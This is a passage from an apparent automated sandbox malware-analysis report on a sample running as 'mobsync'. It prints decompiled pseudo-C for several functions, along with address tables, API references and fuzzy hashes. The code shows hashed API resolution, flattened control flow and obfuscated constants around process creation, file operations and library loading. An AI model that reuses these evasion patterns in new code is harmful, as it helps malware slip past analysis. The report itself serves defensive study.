										if(_t2 != 0x15a7f569) {
											goto L21;
										} else {
											E002C7080(_t21, 0x2cd860, 0, _t57);
											_t2 = 0x39797244;
											continue;
										}
									}
								}
							}
						}
						L30:
					}
					__eflags = _t2 - 0x2eb73d4f;
					if(__eflags > 0) {
						__eflags = _t2 - 0x39797244;
						if(__eflags != 0) {
							goto L21;
						} else {
							E002C7080(_t21, 0x2cd890, 1, __eflags);
							_t2 = 0x185e9846;
							goto L1;
						}
					} else {
						if(__eflags == 0) {
							E002C7080(_t21, 0x2cd7e0, 5, __eflags);
							_t2 = 0x22a44863;
							goto L1;
						} else {
							__eflags = _t2 - 0x22a44863;
							if(__eflags == 0) {
								E002C7080(_t21, 0x2cd8c0, 6, __eflags);
								_t2 = 0x1a8031ec;
								goto L1;
							} else {
								__eflags = _t2 - 0x291da748;
								if(__eflags != 0) {
									goto L21;
								} else {
									_t2 = 0x15a7f569;
									goto L1;
								}
							}
						}
					}
					goto L30;
					L21:
					__eflags = _t2 - 0x21acdd7e;
				} while (__eflags != 0);
				return _t2;
				goto L30;
			}














                                                                                0x002c7120
                                                                                0x002c7120
                                                                                0x002c7120
                                                                                0x002c7125
                                                                                0x002c7125
                                                                                0x002c7125
                                                                                0x002c7125
                                                                                0x002c712a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x002c7130
                                                                                0x002c723f
                                                                                0x002c7246
                                                                                0x002c7248
                                                                                0x002c7260
                                                                                0x002c7260
                                                                                0x002c7266
                                                                                0x002c7268
                                                                                0x002c726e
                                                                                0x002c7271
                                                                                0x002c7276
                                                                                0x002c7278
                                                                                0x002c728b
                                                                                0x002c7290
                                                                                0x002c7290
                                                                                0x002c7297
                                                                                0x002c7299
                                                                                0x002c729e
                                                                                0x002c72a0
                                                                                0x002c72b3
                                                                                0x002c72b8
                                                                                0x002c72b8
                                                                                0x002c72c5
                                                                                0x002c7136
                                                                                0x002c7136
                                                                                0x002c713b
                                                                                0x002c7190
                                                                                0x002c7195
                                                                                0x00000000
                                                                                0x002c719b
                                                                                0x002c71a5
                                                                                0x002c71aa
                                                                                0x00000000
                                                                                0x002c71aa
                                                                                0x002c713d
                                                                                0x002c713d
                                                                                0x002c7184
                                                                                0x002c7189
                                                                                0x00000000
                                                                                0x002c713f
                                                                                0x002c7144
                                                                                0x002c716e
                                                                                0x002c7173
                                                                                0x00000000
                                                                                0x002c7146
                                                                                0x002c7146
                                                                                0x002c714b
                                                                                0x00000000
                                                                                0x002c7151
                                                                                0x002c7158
                                                                                0x002c715d
                                                                                0x00000000
                                                                                0x002c715d
                                                                                0x002c714b
                                                                                0x002c7144
                                                                                0x002c713d
                                                                                0x002c713b
                                                                                0x00000000
                                                                                0x002c7130
                                                                                0x002c71b4
                                                                                0x002c71b9
                                                                                0x002c7207
                                                                                0x002c720c
                                                                                0x00000000
                                                                                0x002c720e
                                                                                0x002c7218
                                                                                0x002c721d
                                                                                0x00000000
                                                                                0x002c721d
                                                                                0x002c71bb
                                                                                0x002c71bb
                                                                                0x002c71f8
                                                                                0x002c71fd
                                                                                0x00000000
                                                                                0x002c71bd
                                                                                0x002c71bd
                                                                                0x002c71c2
                                                                                0x002c71df
                                                                                0x002c71e4
                                                                                0x00000000
                                                                                0x002c71c4
                                                                                0x002c71c4
                                                                                0x002c71c9
                                                                                0x00000000
                                                                                0x002c71cb
                                                                                0x002c71cb
                                                                                0x00000000
                                                                                0x002c71cb
                                                                                0x002c71c9
                                                                                0x002c71c2
                                                                                0x002c71bb
                                                                                0x00000000
                                                                                0x002c7227
                                                                                0x002c7227
                                                                                0x002c7227
                                                                                0x002c7232
                                                                                0x00000000

                                                                                APIs
                                                                                • LoadLibraryW.KERNEL32(00000000,?,3251FEFE,002C68AC), ref: 002C7266
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2300986069.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true
                                                                                • Associated: 0000000C.00000002.2300951864.00000000002C0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000C.00000002.2301020512.00000000002CD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000C.00000002.2301054781.00000000002CF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2c0000_mobsync.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID: ~a$Dry9$Dry9
                                                                                • API String ID: 1029625771-1202258579
                                                                                • Opcode ID: 6b9cb6527ba5d0ab8b0d8b95e000adb1f0f21c18da6a96abe5227e0fbe4c0e63
                                                                                • Instruction ID: 79f28196093cfe2a831bc56c8c0227e34f9d383c3e712f498eccc21f4b2105c6
                                                                                • Opcode Fuzzy Hash: 6b9cb6527ba5d0ab8b0d8b95e000adb1f0f21c18da6a96abe5227e0fbe4c0e63
                                                                                • Instruction Fuzzy Hash: BE31E620B3C10143DA28AEB96895F6E00AA9BB0304B24473EF459CB755DD66CD324FD2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002C3780, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 102COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 301 2c3780-2c3793 302 2c3795-2c37ab call 2c3f00 call 2c3e60 301->302 303 2c37b0-2c37c5 301->303 302->303 308 2c37c7-2c37dd call 2c3f00 call 2c3e60 303->308 309 2c37e2-2c37fa 303->309 308->309 315 2c37fc-2c3812 call 2c3f00 call 2c3e60 309->315 316 2c3817-2c3832 309->316 315->316 322 2c384f-2c385e 316->322 323 2c3834-2c384a call 2c3f00 call 2c3e60 316->323 329 2c387b-2c38b4 322->329 330 2c3860-2c3876 call 2c3f00 call 2c3e60 322->330 323->322 336 2c38b6-2c38cc call 2c3f00 call 2c3e60 329->336 337 2c38d1-2c38e2 SHFileOperationW 329->337 330->329 336->337
                                                                                C-Code - Quality: 62%
                                                                                			E002C3780(void* __ecx, void* __edx, void* __edi, void* __esi) {
				char _v520;
				char _v528;
				char _v536;
				char _v1040;
				char _v1056;
				short _v1072;
				char* _v1076;
				char* _v1080;
				intOrPtr _v1084;
				intOrPtr* _t12;
				intOrPtr* _t14;
				intOrPtr* _t16;
				intOrPtr* _t18;
				intOrPtr* _t20;
				signed int _t26;
				void* _t36;
				void* _t63;
				void* _t66;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t72;
				struct _SHFILEOPSTRUCTW* _t73;

				_t70 =  &_v1072;
				_t12 =  *0x2cddc0;
				_t66 = __ecx;
				_t63 = __edx;
				if(_t12 == 0) {
					_t12 = E002C3E60(_t36, E002C3F00(0xc6fbcd74), 0x7e0ae558, _t69);
					 *0x2cddc0 = _t12;
				}
				 *_t12( &_v1072, 0, 0x1e);
				_t14 =  *0x2cddc0;
				_t71 = _t70 + 0xc;
				if(_t14 == 0) {
					_t14 = E002C3E60(_t36, E002C3F00(0xc6fbcd74), 0x7e0ae558, _t69);
					 *0x2cddc0 = _t14;
				}
				 *_t14( &_v1040, 0, 0x208);
				_t16 =  *0x2cddc0;
				_t72 = _t71 + 0xc;
				if(_t16 == 0) {
					_t16 = E002C3E60(_t36, E002C3F00(0xc6fbcd74), 0x7e0ae558, _t69);
					 *0x2cddc0 = _t16;
				}
				 *_t16( &_v520, 0, 0x208);
				_t18 =  *0x2ce298;
				_t73 = _t72 + 0xc;
				if(_t18 == 0) {
					_t18 = E002C3E60(_t36, E002C3F00(0x9bab0b12), 0xba782e65, _t69);
					 *0x2ce298 = _t18;
				}
				 *_t18( &_v1040, _t66);
				_t20 =  *0x2ce298;
				if(_t20 == 0) {
					_t20 = E002C3E60(_t36, E002C3F00(0x9bab0b12), 0xba782e65, _t69);
					 *0x2ce298 = _t20;
				}
				 *_t20( &_v528, _t63);
				_v1084 = 1;
				_v1080 =  &_v1056;
				_v1076 =  &_v536;
				_v1072 = 0xe14;
				if( *0x2ce30c == 0) {
					 *0x2ce30c = E002C3E60(_t36, E002C3F00(0xd9518805), 0x262a6194, _t69);
				}
				_t26 = SHFileOperationW(_t73); // executed
				asm("sbb eax, eax");
				return  ~_t26 + 1;
			}


























                                                                                0x002c3785
                                                                                0x002c3780
                                                                                0x002c378c
                                                                                0x002c378f
                                                                                0x002c3793
                                                                                0x002c37a6
                                                                                0x002c37ab
                                                                                0x002c37ab
                                                                                0x002c37b9
                                                                                0x002c37bb
                                                                                0x002c37c0
                                                                                0x002c37c5
                                                                                0x002c37d8
                                                                                0x002c37dd
                                                                                0x002c37dd
                                                                                0x002c37ee
                                                                                0x002c37f0
                                                                                0x002c37f5
                                                                                0x002c37fa
                                                                                0x002c380d
                                                                                0x002c3812
                                                                                0x002c3812
                                                                                0x002c3826
                                                                                0x002c3828
                                                                                0x002c382d
                                                                                0x002c3832
                                                                                0x002c3845
                                                                                0x002c384a
                                                                                0x002c384a
                                                                                0x002c3855
                                                                                0x002c3857
                                                                                0x002c385e
                                                                                0x002c3871
                                                                                0x002c3876
                                                                                0x002c3876
                                                                                0x002c3884
                                                                                0x002c388a
                                                                                0x002c3892
                                                                                0x002c389d
                                                                                0x002c38a6
                                                                                0x002c38b4
                                                                                0x002c38cc
                                                                                0x002c38cc
                                                                                0x002c38d5
                                                                                0x002c38d9
                                                                                0x002c38e2

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2300986069.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true
                                                                                • Associated: 0000000C.00000002.2300951864.00000000002C0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000C.00000002.2301020512.00000000002CD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000C.00000002.2301054781.00000000002CF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2c0000_mobsync.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileOperation
                                                                                • String ID: X~$X~$X~
                                                                                • API String ID: 3080627654-3258893172
                                                                                • Opcode ID: b42b06bba45a62c4a506256c3c927b1f1055d327a07465ab57e8fe8112c1fc07
                                                                                • Instruction ID: 1f57c44956de9d8bd9045297e0bc5691b03c63bee79cb3ee6492db42539ecfd5
                                                                                • Opcode Fuzzy Hash: b42b06bba45a62c4a506256c3c927b1f1055d327a07465ab57e8fe8112c1fc07
                                                                                • Instruction Fuzzy Hash: 4C319071A202054BDB14EB79EC15FAB77E6ABD4704F008E2DB815CB291EA34DA158B91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002C4B70, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87processCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 343 2c4b70-2c4b80 344 2c4b9d-2c4bba 343->344 345 2c4b82-2c4b98 call 2c3f00 call 2c3e60 343->345 350 2c4bbc-2c4bd2 call 2c3f00 call 2c3e60 344->350 351 2c4bd7-2c4bf5 CreateProcessW 344->351 345->344 350->351 354 2c4bf7-2c4bfd 351->354 355 2c4c73-2c4c7a 351->355 357 2c4bff-2c4c13 354->357 358 2c4c14-2c4c1b 354->358 359 2c4c1d-2c4c33 call 2c3f00 call 2c3e60 358->359 360 2c4c38-2c4c45 358->360 359->360 367 2c4c47-2c4c5d call 2c3f00 call 2c3e60 360->367 368 2c4c62-2c4c72 360->368 367->368
                                                                                C-Code - Quality: 60%
                                                                                			E002C4B70(void* __ebx, WCHAR* __ecx, WCHAR* __edx, void* __ebp, int _a4, intOrPtr _a12) {
				struct _STARTUPINFOW _v72;
				struct _PROCESS_INFORMATION _v88;
				intOrPtr* _t9;
				int _t12;
				intOrPtr* _t15;
				intOrPtr* _t17;
				WCHAR* _t44;
				WCHAR* _t45;

				_t46 = __ebp;
				_t26 = __ebx;
				_t9 =  *0x2cddc0;
				_t45 = __edx;
				_t44 = __ecx;
				if(_t9 == 0) {
					_t9 = E002C3E60(__ebx, E002C3F00(0xc6fbcd74), 0x7e0ae558, __ebp);
					 *0x2cddc0 = _t9;
				}
				 *_t9( &_v72, 0, 0x44);
				_v72.cb = 0x44;
				if( *0x2ce21c == 0) {
					 *0x2ce21c = E002C3E60(_t26, E002C3F00(0x9bab0b12), 0xbd6cc871, _t46);
				}
				_t12 = CreateProcessW(_t44, _t45, 0, 0, _a4, 0, 0, 0,  &_v72,  &_v88); // executed
				if(_t12 == 0) {
					return 0;
				} else {
					if(_a12 == 0) {
						_t15 =  *0x2cde3c;
						if(_t15 == 0) {
							_t15 = E002C3E60(_t26, E002C3F00(0x9bab0b12), 0x20de7595, _t46);
							 *0x2cde3c = _t15;
						}
						 *_t15(_v88.hProcess);
						_t17 =  *0x2cde3c;
						if(_t17 == 0) {
							_t17 = E002C3E60(_t26, E002C3F00(0x9bab0b12), 0x20de7595, _t46);
							 *0x2cde3c = _t17;
						}
						 *_t17(_v88.hProcess);
						return 1;
					} else {
						asm("movdqu xmm0, [esp+0x8]");
						asm("movdqu [eax], xmm0");
						return 1;
					}
				}
			}











                                                                                0x002c4b70
                                                                                0x002c4b70
                                                                                0x002c4b70
                                                                                0x002c4b79
                                                                                0x002c4b7c
                                                                                0x002c4b80
                                                                                0x002c4b93
                                                                                0x002c4b98
                                                                                0x002c4b98
                                                                                0x002c4ba6
                                                                                0x002c4bb0
                                                                                0x002c4bba
                                                                                0x002c4bd2
                                                                                0x002c4bd2
                                                                                0x002c4bf1
                                                                                0x002c4bf5
                                                                                0x002c4c7a
                                                                                0x002c4bf7
                                                                                0x002c4bfd
                                                                                0x002c4c14
                                                                                0x002c4c1b
                                                                                0x002c4c2e
                                                                                0x002c4c33
                                                                                0x002c4c33
                                                                                0x002c4c3c
                                                                                0x002c4c3e
                                                                                0x002c4c45
                                                                                0x002c4c58
                                                                                0x002c4c5d
                                                                                0x002c4c5d
                                                                                0x002c4c66
                                                                                0x002c4c72
                                                                                0x002c4bff
                                                                                0x002c4bff
                                                                                0x002c4c05
                                                                                0x002c4c13
                                                                                0x002c4c13
                                                                                0x002c4bfd

                                                                                APIs
                                                                                • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 002C4BF1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2300986069.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true
                                                                                • Associated: 0000000C.00000002.2300951864.00000000002C0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000C.00000002.2301020512.00000000002CD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000C.00000002.2301054781.00000000002CF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2c0000_mobsync.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID: D$X~
                                                                                • API String ID: 963392458-2090554203
                                                                                • Opcode ID: a6390f80a22d75992e94bcc0ab477bba3ead8ffb2fe5442bb5b556c32f6c04c8
                                                                                • Instruction ID: 3a46de4e7a0212ee1f500d5efdb4c0b0b4808946e34fa43d963091b5c14412af
                                                                                • Opcode Fuzzy Hash: a6390f80a22d75992e94bcc0ab477bba3ead8ffb2fe5442bb5b556c32f6c04c8
                                                                                • Instruction Fuzzy Hash: 3C21A631B103025BDB14EF79DC55FAB37A6ABD0704F00892DB554CB2A1EA74CE258B91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002C80A0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 219fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 375 2c80a0-2c815b 376 2c8163-2c8168 375->376 377 2c8170-2c8175 376->377 378 2c8338-2c833d 377->378 379 2c817b 377->379 382 2c836f-2c8377 378->382 383 2c833f-2c8344 378->383 380 2c8287-2c829b call 2c34c0 379->380 381 2c8181-2c8186 379->381 401 2c829d-2c82b5 call 2c3f00 call 2c3e60 380->401 402 2c82bb-2c82e3 380->402 384 2c818c-2c8191 381->384 385 2c8252-2c8259 381->385 389 2c8379-2c8391 call 2c3f00 call 2c3e60 382->389 390 2c8397-2c83bb CreateFileW 382->390 386 2c8365-2c836a 383->386 387 2c8346-2c834b 383->387 396 2c81e3-2c821a 384->396 397 2c8193-2c8198 384->397 392 2c825b-2c8271 call 2c3f00 call 2c3e60 385->392 393 2c8276-2c8282 385->393 386->377 398 2c834d-2c8352 387->398 399 2c83c7-2c83ce 387->399 389->390 394 2c83bd-2c83c2 390->394 395 2c83ee-2c83fa 390->395 392->393 393->377 394->377 408 2c821c-2c8232 call 2c3f00 call 2c3e60 396->408 409 2c8237-2c824d 396->409 397->398 407 2c819e-2c81e1 call 2cb6e0 397->407 398->377 410 2c8358-2c8364 398->410 405 2c83eb 399->405 406 2c83d0-2c83e6 call 2c3f00 call 2c3e60 399->406 401->402 427 2c82e5-2c82fb call 2c3f00 call 2c3e60 402->427 428 2c8300-2c830b 402->428 405->395 406->405 407->377 408->409 409->377 427->428 438 2c830d-2c8323 call 2c3f00 call 2c3e60 428->438 439 2c8328-2c8333 428->439 438->439 439->376
                                                                                C-Code - Quality: 66%
                                                                                			E002C80A0(signed int __edx) {
				short _v524;
				struct _SECURITY_ATTRIBUTES* _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				char _v564;
				intOrPtr _v568;
				char _v572;
				struct _SECURITY_ATTRIBUTES* _v576;
				intOrPtr _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				void* __ebx;
				void* __ebp;
				void* _t58;
				void* _t64;
				void* _t66;
				intOrPtr* _t68;
				void* _t72;
				intOrPtr* _t77;
				intOrPtr* _t79;
				void* _t81;
				void* _t82;
				intOrPtr* _t85;
				void* _t87;
				intOrPtr _t88;
				intOrPtr* _t89;
				void* _t91;
				void* _t95;
				intOrPtr _t100;
				char _t104;
				signed int _t121;
				void* _t124;
				void* _t126;
				void* _t127;
				signed int* _t128;
				void* _t130;

				_t121 = __edx;
				_t128 =  &_v596;
				_v584 = 0x9318;
				_t58 = 0x343bfd89;
				_v584 = _v584 ^ 0xde90c338;
				_v584 = _v584 ^ 0xde905120;
				_v596 = 0x7d19;
				_v596 = _v596 << 9;
				_v596 = _v596 >> 0xe;
				_v596 = _v596 + 0xffff07e5;
				_v596 = _v596 | 0x8aea6eef;
				_v596 = _v596 + 0xd867;
				_v596 = _v596 + 0x9c41;
				_v596 = _v596 + 0x3de0;
				_v596 = _v596 + 0x218b;
				_v596 = _v596 ^ 0x00014403;
				_v592 = 0x2591;
				_t127 = _v584;
				_t95 = 0;
				_v592 = _v592 * 0x7d;
				_v592 = _v592 + 0x8d68;
				_v592 = _v592 + 0xffff8911;
				_v592 = _v592 * 0x6a;
				_v592 = _v592 + 0xffff93d5;
				_v592 = _v592 ^ 0x07a13cd2;
				_v588 = 0x789;
				_v588 = _v588 >> 1;
				_v588 = _v588 ^ 0xaee58af2;
				_v588 = _v588 ^ 0xaee58936;
				while(1) {
					L1:
					goto L2;
					do {
						while(1) {
							L2:
							_t130 = _t58 - 0xea5411f;
							if(_t130 > 0) {
								break;
							}
							if(_t130 == 0) {
								_t72 = E002C34C0(0x2cd970);
								_t121 =  *0x2ce158;
								_t126 = _t72;
								if(_t121 == 0) {
									_t121 = E002C3E60(_t95, E002C3F00(0xc6fbcd74), 0xba71dd03, _t127);
									 *0x2ce158 = _t121;
								}
								_t100 =  *0x2ce54c; // 0x5de048
								_t50 = _t100 + 0x260; // 0x5de2a8
								_t51 = _t100 + 0x18; // 0x5de060
								 *_t121( &_v524, 0x104, _t126, _t51, _t50);
								_t77 =  *0x2ce494;
								_t128 =  &(_t128[5]);
								if(_t77 == 0) {
									_t82 = E002C3F00(0x9bab0b12);
									_t121 = 0x7facde30;
									_t77 = E002C3E60(_t95, _t82, 0x7facde30, _t127);
									 *0x2ce494 = _t77;
								}
								_t124 =  *_t77();
								_t79 =  *0x2cdf30;
								if(_t79 == 0) {
									_t81 = E002C3F00(0x9bab0b12);
									_t121 = 0x5010a54d;
									_t79 = E002C3E60(_t95, _t81, 0x5010a54d, _t127);
									 *0x2cdf30 = _t79;
								}
								 *_t79(_t124, 0, _t126);
								_t58 = 0x2c2d24c8;
								goto L1;
							} else {
								if(_t58 == 0x2f64d8b) {
									_t85 =  *0x2ce1d4;
									if(_t85 == 0) {
										_t87 = E002C3F00(0x9bab0b12);
										_t121 = 0xa229df38;
										_t85 = E002C3E60(_t95, _t87, 0xa229df38, _t127);
										 *0x2ce1d4 = _t85;
									}
									 *_t85( &_v572);
									_t58 = 0xc5e088d;
									continue;
								} else {
									if(_t58 == 0x6f65414) {
										_t88 = _v568;
										_t104 = _v572;
										_v560 = _t88;
										_v552 = _t88;
										_v544 = _t88;
										_v536 = _t88;
										_t89 =  *0x2cdee4;
										_v564 = _t104;
										_v556 = _t104;
										_v548 = _t104;
										_v540 = _t104;
										_v532 = 0;
										if(_t89 == 0) {
											_t91 = E002C3F00(0x9bab0b12);
											_t121 = 0x4bf45878;
											_t89 = E002C3E60(_t95, _t91, 0x4bf45878, _t127);
											 *0x2cdee4 = _t89;
										}
										 *_t89(_t127, 0,  &_v564, 0x28);
										_t58 = 0x3557bd8c;
										_t95 =  !=  ? 1 : _t95;
										continue;
									} else {
										if(_t58 != 0xc5e088d) {
											goto L24;
										} else {
											_v580 = 0xa8c00;
											_v576 = 0;
											_v596 = E002CB6E0(_v580, _v576, 0x989680, 0);
											_v592 = _t121;
											_v588 = _v588 - _v596;
											_t58 = 0xea5411f;
											asm("sbb [esp+0x2c], ecx");
											continue;
										}
									}
								}
							}
							L35:
						}
						if(_t58 == 0x2c2d24c8) {
							if( *0x2cde04 == 0) {
								_t66 = E002C3F00(0x9bab0b12);
								_t121 = 0xb66d748a;
								 *0x2cde04 = E002C3E60(_t95, _t66, 0xb66d748a, _t127);
							}
							_t64 = CreateFileW( &_v524, _v584, _v596, 0, _v592, _v588, 0); // executed
							_t127 = _t64;
							if(_t127 == 0xffffffff) {
								goto L34;
							} else {
								_t58 = 0x6f65414;
								goto L2;
							}
						} else {
							if(_t58 == 0x343bfd89) {
								_t58 = 0x2f64d8b;
								goto L2;
							} else {
								if(_t58 == 0x3557bd8c) {
									_t68 =  *0x2cde3c;
									if(_t68 == 0) {
										_t68 = E002C3E60(_t95, E002C3F00(0x9bab0b12), 0x20de7595, _t127);
										 *0x2cde3c = _t68;
									}
									 *_t68(_t127);
									L34:
									return _t95;
								} else {
									goto L24;
								}
							}
						}
						goto L35;
						L24:
					} while (_t58 != 0xcfe8e);
					return _t95;
					goto L35;
				}
			}














































                                                                                0x002c80a0
                                                                                0x002c80a0
                                                                                0x002c80a6
                                                                                0x002c80ae
                                                                                0x002c80b3
                                                                                0x002c80bb
                                                                                0x002c80c3
                                                                                0x002c80ca
                                                                                0x002c80ce
                                                                                0x002c80d2
                                                                                0x002c80d9
                                                                                0x002c80e0
                                                                                0x002c80e7
                                                                                0x002c80ee
                                                                                0x002c80f5
                                                                                0x002c80fc
                                                                                0x002c8103
                                                                                0x002c8112
                                                                                0x002c8116
                                                                                0x002c8119
                                                                                0x002c811d
                                                                                0x002c8125
                                                                                0x002c8133
                                                                                0x002c8137
                                                                                0x002c813f
                                                                                0x002c8147
                                                                                0x002c814f
                                                                                0x002c8153
                                                                                0x002c815b
                                                                                0x002c8163
                                                                                0x002c8163
                                                                                0x002c8168
                                                                                0x002c8170
                                                                                0x002c8170
                                                                                0x002c8170
                                                                                0x002c8170
                                                                                0x002c8175
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x002c817b
                                                                                0x002c828c
                                                                                0x002c8291
                                                                                0x002c8297
                                                                                0x002c829b
                                                                                0x002c82b3
                                                                                0x002c82b5
                                                                                0x002c82b5
                                                                                0x002c82bb
                                                                                0x002c82c1
                                                                                0x002c82c8
                                                                                0x002c82d7
                                                                                0x002c82d9
                                                                                0x002c82de
                                                                                0x002c82e3
                                                                                0x002c82ea
                                                                                0x002c82ef
                                                                                0x002c82f6
                                                                                0x002c82fb
                                                                                0x002c82fb
                                                                                0x002c8302
                                                                                0x002c8304
                                                                                0x002c830b
                                                                                0x002c8312
                                                                                0x002c8317
                                                                                0x002c831e
                                                                                0x002c8323
                                                                                0x002c8323
                                                                                0x002c832c
                                                                                0x002c832e
                                                                                0x00000000
                                                                                0x002c8181
                                                                                0x002c8186
                                                                                0x002c8252
                                                                                0x002c8259
                                                                                0x002c8260
                                                                                0x002c8265
                                                                                0x002c826c
                                                                                0x002c8271
                                                                                0x002c8271
                                                                                0x002c827b
                                                                                0x002c827d
                                                                                0x00000000
                                                                                0x002c818c
                                                                                0x002c8191
                                                                                0x002c81e3
                                                                                0x002c81e7
                                                                                0x002c81eb
                                                                                0x002c81ef
                                                                                0x002c81f3
                                                                                0x002c81f7
                                                                                0x002c81fb
                                                                                0x002c8200
                                                                                0x002c8204
                                                                                0x002c8208
                                                                                0x002c820c
                                                                                0x002c8210
                                                                                0x002c821a
                                                                                0x002c8221
                                                                                0x002c8226
                                                                                0x002c822d
                                                                                0x002c8232
                                                                                0x002c8232
                                                                                0x002c8241
                                                                                0x002c8245
                                                                                0x002c824a
                                                                                0x00000000
                                                                                0x002c8193
                                                                                0x002c8198
                                                                                0x00000000
                                                                                0x002c819e
                                                                                0x002c81a0
                                                                                0x002c81a8
                                                                                0x002c81c4
                                                                                0x002c81c8
                                                                                0x002c81d4
                                                                                0x002c81d8
                                                                                0x002c81dd
                                                                                0x00000000
                                                                                0x002c81dd
                                                                                0x002c8198
                                                                                0x002c8191
                                                                                0x002c8186
                                                                                0x00000000
                                                                                0x002c817b
                                                                                0x002c833d
                                                                                0x002c8377
                                                                                0x002c837e
                                                                                0x002c8383
                                                                                0x002c8391
                                                                                0x002c8391
                                                                                0x002c83b4
                                                                                0x002c83b6
                                                                                0x002c83bb
                                                                                0x00000000
                                                                                0x002c83bd
                                                                                0x002c83bd
                                                                                0x00000000
                                                                                0x002c83bd
                                                                                0x002c833f
                                                                                0x002c8344
                                                                                0x002c8365
                                                                                0x00000000
                                                                                0x002c8346
                                                                                0x002c834b
                                                                                0x002c83c7
                                                                                0x002c83ce
                                                                                0x002c83e1
                                                                                0x002c83e6
                                                                                0x002c83e6
                                                                                0x002c83ec
                                                                                0x002c83f1
                                                                                0x002c83fa
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x002c834b
                                                                                0x002c8344
                                                                                0x00000000
                                                                                0x002c834d
                                                                                0x002c834d
                                                                                0x002c8364
                                                                                0x00000000
                                                                                0x002c8364

                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,?,3251FEFE,?,?), ref: 002C83B4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2300986069.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true
                                                                                • Associated: 0000000C.00000002.2300951864.00000000002C0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000C.00000002.2301020512.00000000002CD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000C.00000002.2301054781.00000000002CF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2c0000_mobsync.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID: H]
                                                                                • API String ID: 823142352-2853106026
                                                                                • Opcode ID: dbc894db1a8b311707f4ac81d4ec131c8374905d3ba4c4e022654d988d783958
                                                                                • Instruction ID: 512238757b63d322cc23d1c545d3d95581f89b1a45874375c2896b9f932cde55
                                                                                • Opcode Fuzzy Hash: dbc894db1a8b311707f4ac81d4ec131c8374905d3ba4c4e022654d988d783958
                                                                                • Instruction Fuzzy Hash: 8881AE706283418FD718DF68D844F6BB7E9AB94748F008A2DF589C7291EBB4DD118B92
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002C30A0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 165memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
